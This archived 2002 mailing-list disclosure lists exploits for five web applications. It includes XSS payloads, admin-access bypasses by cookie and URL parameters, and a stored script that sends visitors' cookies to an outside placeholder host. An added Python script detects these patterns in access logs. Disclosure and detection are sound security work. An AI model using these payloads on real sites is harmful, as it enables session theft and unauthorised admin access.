Vulnerability Development mailing list archives

Security holes : PHP Image View, NewsPro, Photo DB, As_web, GuestBook


From: frog frog <leseulfrog () hotmail com>
Date: 4 May 2002 15:41:41 -0000



Hi all :)

1) PHP Image View 1.0
http://www.onlinetools.org

Problems :
- XSS
- phpinfo();

Exploits :
- /phpimageview.php?pw=show
- /phpimageview.php?pic=javascript:alert(document.domain)

2) NewsPro 1.01
http://www.aspbin.co.uk

Problem :
- Admin access

Exploit :
- Set cookie "logged,true" on the administration

3) Photo DB 1.4
http://www.brokenbytes.org

Problem :
- Admin access

Exploit :
- /[THEADMINSPAGE]?PHPSESSID=abc123&Time=9999999999999&rmtusername=hop&rmtpassword=hop&accessevel=-5


4) As_web.exe 1 & 4
http://www.asksam.com

Problems :
- XSS
- Path Disclosure

Exploits :
- http://www.host.com/as_web.exe?Command=search&file=non-existant-file&request=&MaxHits=10&NumLines=1

- http://www.host.com/as_web.exe?non-existant
- http://www.host.com/as_web4.exe?Command=First&File=non-existant-file

- /as_web4.exe?existant-ask-file!!.ask+B+<script>ANYSCRIPT</script>

- /as_web.exe?existant-ask-file!!.ask+B+<script>ANYSCRIPT<script>


5) GuestBook 1.00
http://www.aspjar.com

Problems :
- Message removing
- XSS

Exploits :
- /admin/delete.asp
- <script>window.open('http://www.url.com/?'+document.cookie)</script> in "web site" on a post

More details :
In French :
http://www.ifrance.com/kitetoua/tuto/5holes4.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2F5holes4.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools


frog-m@n
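
Added example, not part of the original message: a log check a site operator could run to find requests matching the patterns listed in this post. The access-log lines are constructed, the combined log format is assumed, and the rule names and the `classify`/`scan` helpers are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [04/May/2002:15:50:01 +0000] "GET /phpimageview.php?pic=holiday.jpg HTTP/1.0" 200 5120
192.0.2.11 - - [04/May/2002:15:51:12 +0000] "GET /phpimageview.php?pw=show HTTP/1.0" 200 40211
192.0.2.11 - - [04/May/2002:15:51:40 +0000] "GET /phpimageview.php?pic=javascript:alert(document.domain) HTTP/1.0" 200 812
192.0.2.12 - - [04/May/2002:15:52:03 +0000] "GET /as_web4.exe?notes.ask+B+%3Cscript%3Ex%3C/script%3E HTTP/1.0" 200 950
192.0.2.13 - - [04/May/2002:15:53:30 +0000] "GET /admin/delete.asp HTTP/1.0" 200 310
192.0.2.14 - - [04/May/2002:15:54:00 +0000] "GET /as_web.exe?Command=search&file=notes.ask&request=tax HTTP/1.0" 200 2300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the names of the rules (hypothetical labels) a request target matches."""
    parts = urlsplit(target)
    path = parts.path.lower()
    query = unquote(parts.query)                      # decode %3C etc. before matching
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    if path.endswith("/phpimageview.php"):
        if params.get("pw") == ["show"]:              # item 1: phpinfo() exposure
            hits.append("phpimageview-phpinfo")
        # item 1: pic= should be a file name, never a URL scheme such as javascript:
        if any(re.match(r"\s*[a-z][a-z0-9+.-]*:", v, re.I) for v in params.get("pic", [])):
            hits.append("phpimageview-pic-scheme")
    if re.search(r"/as_web4?\.exe$", path) and re.search(r"<\s*script", query, re.I):
        hits.append("as_web-script-in-query")         # item 4: markup echoed from the query
    if path.endswith("/admin/delete.asp"):            # item 5: review every direct request
        hits.append("guestbook-delete-direct")
    if "accessevel" in params and "rmtusername" in params:
        hits.append("photodb-session-params")         # item 3: session values sent in the URL
    return hits

def scan(log_text):
    """Return (client_ip, rule) pairs for every matching request in the log."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            findings.extend((line.split()[0], rule) for rule in classify(m.group(1)))
    return findings

if __name__ == "__main__":
    for ip, rule in scan(SAMPLE_LOG):
        print(ip, rule)
```

The NewsPro issue (item 2) is carried in a cookie, so it only shows up in logs that record the Cookie request header.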

